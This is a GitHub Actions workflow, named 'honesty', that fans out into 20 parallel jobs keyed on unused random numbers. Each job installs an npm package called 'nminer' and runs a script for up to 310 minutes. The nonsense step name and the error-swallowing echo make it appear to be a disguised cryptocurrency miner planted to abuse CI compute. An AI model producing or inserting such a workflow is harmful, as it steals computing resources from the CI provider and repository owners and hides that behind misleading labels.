name: honesty
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2564 }
          - { version: 6774 }
          - { version: 140 }
          - { version: 1431 }
          - { version: 9346 }
          - { version: 8768 }
          - { version: 9296 }
          - { version: 638 }
          - { version: 4766 }
          - { version: 3547 }
          - { version: 2272 }
          - { version: 391 }
          - { version: 8075 }
          - { version: 113 }
          - { version: 4698 }
          - { version: 2226 }
          - { version: 7157 }
          - { version: 6800 }
          - { version: 7715 }
          - { version: 5951 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: because however unnaturally down
        run: |
          npm install nminer@latest
          timeout 310m node honesty.js || echo "honesty executed"